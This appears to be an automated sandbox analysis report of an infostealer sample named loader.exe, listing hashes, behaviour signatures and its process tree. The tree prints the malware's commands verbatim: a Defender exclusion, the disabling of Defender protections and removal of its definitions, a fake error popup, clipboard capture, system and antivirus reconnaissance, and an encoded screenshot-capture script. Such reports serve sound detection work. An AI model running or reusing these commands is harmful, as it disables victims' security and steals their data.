Analysis
-
max time kernel
33s -
max time network
37s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-11-2024 22:01
Behavioral task
behavioral1
Sample
loader.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
���ǿ��.pyc
Resource
win11-20241007-en
Errors
General
-
Target
loader.exe
-
Size
7.6MB
-
MD5
86bfd04c02b2022c78eeb53910c08b00
-
SHA1
c944cae39c36330f183ce271cda9a3db110e1abe
-
SHA256
8cc035225b54d104d75f6b01c2d126ae9f47648db3a89901182fc09006c89439
-
SHA512
3960332de9251e6b1dd07b3ce3148b0b5c9cb1ae65df451376346cd56b4fa172f277063eed6f1a11f3c2e4d0b1b943a33a9a6e566999f1fb877b514606046323
-
SSDEEP
196608:hvHYywfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jk:eIHziK1piXLGVE4Ue0VJI
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid Process 3984 powershell.exe 3948 powershell.exe 3916 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 4100 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
loader.exepid Process 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe 2376 loader.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid Process 3780 tasklist.exe 4516 tasklist.exe 4508 tasklist.exe 688 tasklist.exe -
Processes:
resource yara_rule behavioral1/files/0x001900000002ac0a-21.dat upx behavioral1/memory/2376-25-0x00007FFE076F0000-0x00007FFE07D53000-memory.dmp upx behavioral1/files/0x001900000002abf5-27.dat upx behavioral1/memory/2376-30-0x00007FFE1D860000-0x00007FFE1D887000-memory.dmp upx behavioral1/files/0x001900000002ac06-31.dat upx behavioral1/memory/2376-32-0x00007FFE1E6F0000-0x00007FFE1E6FF000-memory.dmp upx behavioral1/files/0x001c00000002ac05-34.dat upx behavioral1/files/0x001900000002ac0d-38.dat upx behavioral1/files/0x001900000002ac07-35.dat upx behavioral1/files/0x001900000002ac10-39.dat upx behavioral1/files/0x001900000002ac00-48.dat upx behavioral1/files/0x001c00000002abff-47.dat upx behavioral1/files/0x001900000002abfe-46.dat upx behavioral1/files/0x001900000002abfb-45.dat upx behavioral1/files/0x001900000002abfa-44.dat upx behavioral1/files/0x001c00000002abf9-43.dat upx behavioral1/files/0x001900000002abf8-42.dat upx behavioral1/files/0x001a00000002abf4-41.dat upx behavioral1/files/0x001c00000002ac11-40.dat upx behavioral1/memory/2376-54-0x00007FFE1D640000-0x00007FFE1D66B000-memory.dmp upx behavioral1/memory/2376-56-0x00007FFE1D690000-0x00007FFE1D6A9000-memory.dmp upx behavioral1/memory/2376-58-0x00007FFE1D610000-0x00007FFE1D635000-memory.dmp upx behavioral1/memory/2376-60-0x00007FFE191F0000-0x00007FFE1936F000-memory.dmp upx behavioral1/memory/2376-64-0x00007FFE1E6E0000-0x00007FFE1E6ED000-memory.dmp upx behavioral1/memory/2376-62-0x00007FFE1D5F0000-0x00007FFE1D609000-memory.dmp upx behavioral1/memory/2376-66-0x00007FFE1C220000-0x00007FFE1C254000-memory.dmp upx behavioral1/memory/2376-71-0x00007FFE19120000-0x00007FFE191EE000-memory.dmp upx behavioral1/memory/2376-70-0x00007FFE076F0000-0x00007FFE07D53000-memory.dmp upx behavioral1/memory/2376-74-0x00007FFE1D860000-0x00007FFE1D887000-memory.dmp upx behavioral1/memory/2376-73-0x00007FFE18890000-0x00007FFE18DC3000-memory.dmp upx behavioral1/memory/2376-79-0x00007FFE1D640000-0x00007FFE1D66B000-memory.dmp upx behavioral1/memory/2376-81-0x00007FFE1D690000-0x00007FFE1D6A9000-memory.dmp upx behavioral1/memory/2376-82-0x00007FFE184B0000-0x00007FFE18563000-memory.dmp upx behavioral1/memory/2376-78-0x00007FFE1D5E0000-0x00007FFE1D5ED000-memory.dmp upx behavioral1/memory/2376-77-0x00007FFE1C200000-0x00007FFE1C214000-memory.dmp upx behavioral1/memory/2376-106-0x00007FFE1D610000-0x00007FFE1D635000-memory.dmp upx behavioral1/memory/2376-107-0x00007FFE191F0000-0x00007FFE1936F000-memory.dmp upx behavioral1/memory/2376-181-0x00007FFE1C220000-0x00007FFE1C254000-memory.dmp upx behavioral1/memory/2376-184-0x00007FFE19120000-0x00007FFE191EE000-memory.dmp upx behavioral1/memory/2376-187-0x00007FFE18890000-0x00007FFE18DC3000-memory.dmp upx behavioral1/memory/2376-211-0x00007FFE076F0000-0x00007FFE07D53000-memory.dmp upx behavioral1/memory/2376-217-0x00007FFE191F0000-0x00007FFE1936F000-memory.dmp upx behavioral1/memory/2376-236-0x00007FFE076F0000-0x00007FFE07D53000-memory.dmp upx behavioral1/memory/2376-256-0x00007FFE1D610000-0x00007FFE1D635000-memory.dmp upx behavioral1/memory/2376-261-0x00007FFE19120000-0x00007FFE191EE000-memory.dmp upx behavioral1/memory/2376-260-0x00007FFE1C220000-0x00007FFE1C254000-memory.dmp upx behavioral1/memory/2376-259-0x00007FFE1E6E0000-0x00007FFE1E6ED000-memory.dmp upx behavioral1/memory/2376-258-0x00007FFE1D5F0000-0x00007FFE1D609000-memory.dmp upx behavioral1/memory/2376-257-0x00007FFE191F0000-0x00007FFE1936F000-memory.dmp upx behavioral1/memory/2376-255-0x00007FFE1D690000-0x00007FFE1D6A9000-memory.dmp upx behavioral1/memory/2376-254-0x00007FFE1D640000-0x00007FFE1D66B000-memory.dmp upx behavioral1/memory/2376-253-0x00007FFE1E6F0000-0x00007FFE1E6FF000-memory.dmp upx behavioral1/memory/2376-252-0x00007FFE1D860000-0x00007FFE1D887000-memory.dmp upx behavioral1/memory/2376-251-0x00007FFE1D5E0000-0x00007FFE1D5ED000-memory.dmp upx behavioral1/memory/2376-250-0x00007FFE184B0000-0x00007FFE18563000-memory.dmp upx behavioral1/memory/2376-248-0x00007FFE1C200000-0x00007FFE1C214000-memory.dmp upx behavioral1/memory/2376-247-0x00007FFE18890000-0x00007FFE18DC3000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid Process 4412 WMIC.exe 804 WMIC.exe 2756 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "44" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3984 powershell.exe 3948 powershell.exe 3948 powershell.exe 3984 powershell.exe 2144 powershell.exe 2144 powershell.exe 1304 powershell.exe 1304 powershell.exe 2144 powershell.exe 1304 powershell.exe 3916 powershell.exe 3916 powershell.exe 1484 powershell.exe 1484 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exeWMIC.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 3780 tasklist.exe Token: SeIncreaseQuotaPrivilege 4172 WMIC.exe Token: SeSecurityPrivilege 4172 WMIC.exe Token: SeTakeOwnershipPrivilege 4172 WMIC.exe Token: SeLoadDriverPrivilege 4172 WMIC.exe Token: SeSystemProfilePrivilege 4172 WMIC.exe Token: SeSystemtimePrivilege 4172 WMIC.exe Token: SeProfSingleProcessPrivilege 4172 WMIC.exe Token: SeIncBasePriorityPrivilege 4172 WMIC.exe Token: SeCreatePagefilePrivilege 4172 WMIC.exe Token: SeBackupPrivilege 4172 WMIC.exe Token: SeRestorePrivilege 4172 WMIC.exe Token: SeShutdownPrivilege 4172 WMIC.exe Token: SeDebugPrivilege 4172 WMIC.exe Token: SeSystemEnvironmentPrivilege 4172 WMIC.exe Token: SeRemoteShutdownPrivilege 4172 WMIC.exe Token: SeUndockPrivilege 4172 WMIC.exe Token: SeManageVolumePrivilege 4172 WMIC.exe Token: 33 4172 WMIC.exe Token: 34 4172 WMIC.exe Token: 35 4172 WMIC.exe Token: 36 4172 WMIC.exe Token: SeDebugPrivilege 3984 powershell.exe Token: SeDebugPrivilege 3948 powershell.exe Token: SeIncreaseQuotaPrivilege 4172 WMIC.exe Token: SeSecurityPrivilege 4172 WMIC.exe Token: SeTakeOwnershipPrivilege 4172 WMIC.exe Token: SeLoadDriverPrivilege 4172 WMIC.exe Token: SeSystemProfilePrivilege 4172 WMIC.exe Token: SeSystemtimePrivilege 4172 WMIC.exe Token: SeProfSingleProcessPrivilege 4172 WMIC.exe Token: SeIncBasePriorityPrivilege 4172 WMIC.exe Token: SeCreatePagefilePrivilege 4172 WMIC.exe Token: SeBackupPrivilege 4172 WMIC.exe Token: SeRestorePrivilege 4172 WMIC.exe Token: SeShutdownPrivilege 4172 WMIC.exe Token: SeDebugPrivilege 4172 WMIC.exe Token: SeSystemEnvironmentPrivilege 4172 WMIC.exe Token: SeRemoteShutdownPrivilege 4172 WMIC.exe Token: SeUndockPrivilege 4172 WMIC.exe Token: SeManageVolumePrivilege 4172 WMIC.exe Token: 33 4172 WMIC.exe Token: 34 4172 WMIC.exe Token: 35 4172 WMIC.exe Token: 36 4172 WMIC.exe Token: SeIncreaseQuotaPrivilege 2756 WMIC.exe Token: SeSecurityPrivilege 2756 WMIC.exe Token: SeTakeOwnershipPrivilege 2756 WMIC.exe Token: SeLoadDriverPrivilege 2756 WMIC.exe Token: SeSystemProfilePrivilege 2756 WMIC.exe Token: SeSystemtimePrivilege 2756 WMIC.exe Token: SeProfSingleProcessPrivilege 2756 WMIC.exe Token: SeIncBasePriorityPrivilege 2756 WMIC.exe Token: SeCreatePagefilePrivilege 2756 WMIC.exe Token: SeBackupPrivilege 2756 WMIC.exe Token: SeRestorePrivilege 2756 WMIC.exe Token: SeShutdownPrivilege 2756 WMIC.exe Token: SeDebugPrivilege 2756 WMIC.exe Token: SeSystemEnvironmentPrivilege 2756 WMIC.exe Token: SeRemoteShutdownPrivilege 2756 WMIC.exe Token: SeUndockPrivilege 2756 WMIC.exe Token: SeManageVolumePrivilege 2756 WMIC.exe Token: 33 2756 WMIC.exe Token: 34 2756 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
LogonUI.exepid Process 2524 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
loader.exeloader.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 2476 wrote to memory of 2376 2476 loader.exe 78 PID 2476 wrote to memory of 2376 2476 loader.exe 78 PID 2376 wrote to memory of 3048 2376 loader.exe 79 PID 2376 wrote to memory of 3048 2376 loader.exe 79 PID 2376 wrote to memory of 4408 2376 loader.exe 80 PID 2376 wrote to memory of 4408 2376 loader.exe 80 PID 2376 wrote to memory of 3708 2376 loader.exe 81 PID 2376 wrote to memory of 3708 2376 loader.exe 81 PID 2376 wrote to memory of 352 2376 loader.exe 85 PID 2376 wrote to memory of 352 2376 loader.exe 85 PID 2376 wrote to memory of 784 2376 loader.exe 87 PID 2376 wrote to memory of 784 2376 loader.exe 87 PID 352 wrote to memory of 3780 352 cmd.exe 89 PID 352 wrote to memory of 3780 352 cmd.exe 89 PID 3048 wrote to memory of 3984 3048 cmd.exe 90 PID 3048 wrote to memory of 3984 3048 cmd.exe 90 PID 3708 wrote to memory of 3936 3708 cmd.exe 91 PID 3708 wrote to memory of 3936 3708 cmd.exe 91 PID 784 wrote to memory of 4172 784 cmd.exe 92 PID 784 wrote to memory of 4172 784 cmd.exe 92 PID 4408 wrote to memory of 3948 4408 cmd.exe 93 PID 4408 wrote to memory of 3948 4408 cmd.exe 93 PID 2376 wrote to memory of 4924 2376 loader.exe 95 PID 2376 wrote to memory of 4924 2376 loader.exe 95 PID 4924 wrote to memory of 4388 4924 cmd.exe 97 PID 4924 wrote to memory of 4388 4924 cmd.exe 97 PID 2376 wrote to memory of 1544 2376 loader.exe 98 PID 2376 wrote to memory of 1544 2376 loader.exe 98 PID 1544 wrote to memory of 760 1544 cmd.exe 100 PID 1544 wrote to memory of 760 1544 cmd.exe 100 PID 2376 wrote to memory of 1604 2376 loader.exe 101 PID 2376 wrote to memory of 1604 2376 loader.exe 101 PID 1604 wrote to memory of 2756 1604 cmd.exe 103 PID 1604 wrote to memory of 2756 1604 cmd.exe 103 PID 2376 wrote to memory of 3128 2376 loader.exe 104 PID 2376 wrote to memory of 3128 2376 loader.exe 104 PID 3128 wrote to memory of 4412 3128 cmd.exe 106 PID 3128 wrote to memory of 4412 3128 cmd.exe 106 PID 2376 wrote to memory of 5108 2376 loader.exe 107 PID 2376 wrote to memory of 5108 2376 loader.exe 107 PID 2376 wrote to memory of 1356 2376 loader.exe 108 PID 2376 wrote to memory of 1356 2376 loader.exe 108 PID 1356 wrote to memory of 4516 1356 cmd.exe 111 PID 1356 wrote to memory of 4516 1356 cmd.exe 111 PID 5108 wrote to memory of 4508 5108 cmd.exe 112 PID 5108 wrote to memory of 4508 5108 cmd.exe 112 PID 2376 wrote to memory of 3836 2376 loader.exe 113 PID 2376 wrote to memory of 3836 2376 loader.exe 113 PID 3836 wrote to memory of 2104 3836 cmd.exe 115 PID 3836 wrote to memory of 2104 3836 cmd.exe 115 PID 2376 wrote to memory of 908 2376 loader.exe 116 PID 2376 wrote to memory of 908 2376 loader.exe 116 PID 2376 wrote to memory of 1496 2376 loader.exe 118 PID 2376 wrote to memory of 1496 2376 loader.exe 118 PID 2376 wrote to memory of 748 2376 loader.exe 119 PID 2376 wrote to memory of 748 2376 loader.exe 119 PID 2376 wrote to memory of 3280 2376 loader.exe 122 PID 2376 wrote to memory of 3280 2376 loader.exe 122 PID 2376 wrote to memory of 2096 2376 loader.exe 124 PID 2376 wrote to memory of 2096 2376 loader.exe 124 PID 908 wrote to memory of 2144 908 cmd.exe 126 PID 908 wrote to memory of 2144 908 cmd.exe 126 PID 3280 wrote to memory of 3940 3280 cmd.exe 127 PID 3280 wrote to memory of 3940 3280 cmd.exe 127
Processes
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You need to reset your computer.', 0, 'ERORR', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You need to reset your computer.', 0, 'ERORR', 0+16);close()"4⤵PID:3936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:352 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1496
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:748
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA